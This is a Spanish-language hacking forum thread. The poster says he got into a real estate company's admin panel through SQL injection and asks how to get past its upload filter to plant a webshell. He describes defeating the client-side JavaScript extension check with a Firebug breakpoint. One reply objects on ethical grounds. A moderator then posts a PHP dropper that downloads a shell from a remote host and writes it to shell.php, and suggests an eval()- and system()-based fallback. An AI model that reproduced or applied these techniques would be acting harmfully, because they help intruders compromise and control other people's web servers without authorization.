elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Filtrar Uploader para subir webshell
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Filtrar Uploader para subir webshell  (Leído 5,618 veces)
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Filtrar Uploader para subir webshell
« en: 26 Marzo 2010, 15:26 pm »

Saludos,

He podido accecer a l'administración web mediante SQLi de una inmobiliaria, el tema es intento subir un fichero Shell "rc99" pero el filtro que tiene template me tira error.

He provado con poner lo normal foto.jpg.php , nada lo salta, luego con el Live Http headers he intentado si podia capturar los headers para modificarlo pero no me da nada........

Si alguien tiene alguna idea como bypasear-lo ???!!!!

El codigo fuente o porcion del mismo es este:



<div id="estadoNuevo"
         style="display: block; font-size: 11px; color: #333333"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Nueva Fotografía</strong>
      </div>

      <div id="estadoEdicion"
         style="display: none; font-size: 11px; color: #333333"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Editar Fotografía</strong>
      </div>

      <table border="0">
         <tr>
            <td valign="top" width="400px"><!--Imagen 1-->
            <div id="Img1" style="width: 400px; display: block; padding: 1.5em">
            <table border="0">
               <tr>

                  <td>
                  <div align="right">
                  <div id="Img1_KO" style="display: none"><img
                     src="./images/extension_ko.gif" alt="Fotografía Incorrecta" /></div>
                  <div id="Img1_OK" style="display: none"><img
                     src="./images/extension_ok.gif" alt="Fotografía Correcta" /></div>
                  <div style="display: inline">Fotografía:&nbsp;&nbsp;</div>
                  </div>
                  </td>

                  <td colspan="3">

                  <div style="display: inline"><input id="input_Img1"
                     name="input_Img1" type="file" size="39"
                     onChange="comprueba_extension(this.form, this.form.input_Img1.value, 1, 'Comprueba la extensión de los archivos a subir.\nSólo se pueden subir archivos con extensión:')" />
                  </div>
                  </td>
               </tr>
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Filtrar Uploader para subir webshell
« Respuesta #1 en: 26 Marzo 2010, 15:35 pm »

Y aqui os dejo la funcion uploader:



</script> <script language="javascript">

//Uploader
function comprueba_extension(formulario, archivo, imagen, mensaje) {
   extensiones_permitidas = new Array(".jpg");
   mierror = "";
   //if (!archivo) {
      //Si no tengo archivo, es que no se ha seleccionado un archivo en el formulario
       //mierror = "No has seleccionado ningún archivo";
   //}else{
      //recupero la extensión de este nombre de archivo
      extension = (archivo.substring(archivo.lastIndexOf("."))).toLowerCase();
      //alert (extension);
      //compruebo si la extensión está entre las permitidas
      permitida = false;
     
      for (var i = 0; i < extensiones_permitidas.length; i++) {
         if (extensiones_permitidas == extension) {
         permitida = true;
         break;
         }
      }
      if (!permitida) {
        mierror = mensaje + extensiones_permitidas.join();
      
      
      checkKO = document.getElementById('Img' + imagen + '_KO');
      checkKO.style.display = 'inline';
      
      checkOK = document.getElementById('Img' + imagen + '_OK');
      checkOK.style.display = 'none';
      
      colorInput = document.getElementById('input_Img' + imagen);
      colorInput.style.color = '#CC3300';

      oculta_btnGuardar =  document.getElementById('guardaImg' + imagen);
      oculta_btnGuardar.style.display = 'none';
      
       }else{
     
      //alert(archivo);
          //submito!
         //alert ("Todo correcto. Voy a submitir el formulario.");
         //formulario.submit();
      
      checkOK = document.getElementById('Img' + imagen + '_OK');
      checkOK.style.display = 'inline';
      
      checkKO = document.getElementById('Img' + imagen + '_KO');
      checkKO.style.display = 'none';
      
      colorInput = document.getElementById('input_Img' + imagen);
      colorInput.style.color = '#71A410';
      
      muestra_btnGuardar =  document.getElementById('guardaImg' + imagen);
      muestra_btnGuardar.style.display = 'block';
      
      nombre = document.getElementById('nomImg' + imagen);
      if (nombre.value == ''){
         archivo = document.getElementById('input_Img' + imagen);
         nombre_archivo = (archivo.value.substring(archivo.value.lastIndexOf('\\')));


         var indice = nombre_archivo.indexOf ('.jpg');
         nombre_archivo = nombre_archivo.substr (0,indice);

         var navegador = navigator.appName;
         if (navegador == "Microsoft Internet Explorer"){
            nombre_archivo = nombre_archivo.substr (1);
         }

         nombre.value = nombre_archivo;
      }
      
      
        return 1;
       }
     
   //}
   //si estoy aqui es que no se ha podido submitir
   alert (mierror);
   return 0;
}
« Última modificación: 26 Marzo 2010, 15:40 pm por nuevaorden » En línea

NikNitro!


Desconectado Desconectado

Mensajes: 1.309


Galletaaa!!!


Ver Perfil WWW
Re: Filtrar Uploader para subir webshell
« Respuesta #2 en: 26 Marzo 2010, 15:44 pm »

Cómprate un libro de ETICA y léete las normas del foro!!!
S@lu2 ;)
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Filtrar Uploader para subir webshell
« Respuesta #3 en: 26 Marzo 2010, 15:47 pm »

Ok muchas gracias por la ayuda, perdon si he saltado alguna norma....... y gracias por la ayuda a los newbaby.

salu2
En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Filtrar Uploader para subir webshell
« Respuesta #4 en: 26 Marzo 2010, 15:57 pm »

que clase de Uploader es ese que comprueba la validez de los archivos el propio cliente? (javascript) y no el servidor (php por ejemplo)...

En línea

Colaboraciones:
1 2
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Filtrar Uploader para subir webshell
« Respuesta #5 en: 26 Marzo 2010, 16:05 pm »

salu2, es un crs de una compañia de españa, he podido saltarme la protección mediante el Firebug, poniendo un BP aquí function comprueba_extension(formulario, archivo, imagen, mensaje) {   , luego puedo modificar en el panel de la derecha la extensión de php a jpg i bingo me deja subir..... pero al pulsar luego un boton de guardar .... aix me sale un popup y me dice que no cumple con el tamaño adecuado!!!

Suiguiendo......
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Filtrar Uploader para subir webshell
« Respuesta #6 en: 26 Marzo 2010, 16:06 pm »

se llama CRSManager.....
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Filtrar Uploader para subir webshell
« Respuesta #7 en: 26 Marzo 2010, 21:49 pm »

usa un script que guarde otro script y así evitas el problema del tamaño:

Código
  1. <?php file_put_contents('shell.php', file_get_contents('http://www.miweb/shell.txt')); ?>

Después cuando lo visualizes el mismo script te va a descargar la shell y ya la hiciste.
Si no te deja bajar nada entonces pruebas con un formulario en un textarea y todo lo que le pases via post lo procesas en eval() y con eso ya puedes experimentar ver archivos con glob(), mover y copiar con move() ver phpinfo(), usar sytem() si es que te deja, etc etc y si puedes sobreescribir archivos entonces hazle un file_put_contents() con la shell en php y ya la hiciste.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
pc para filtrar web
Redes
kakashi20 1 5,215 Último mensaje 17 Febrero 2011, 09:47 am
por madpitbull_99
[PHP] DruggedCat Webshell v1.0
PHP
wlan0 0 1,723 Último mensaje 20 Agosto 2012, 08:14 am
por wlan0
Subir webshell a un sistema XOOPS
Nivel Web
Shell Root 2 2,658 Último mensaje 8 Julio 2013, 14:16 pm
por Søra
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines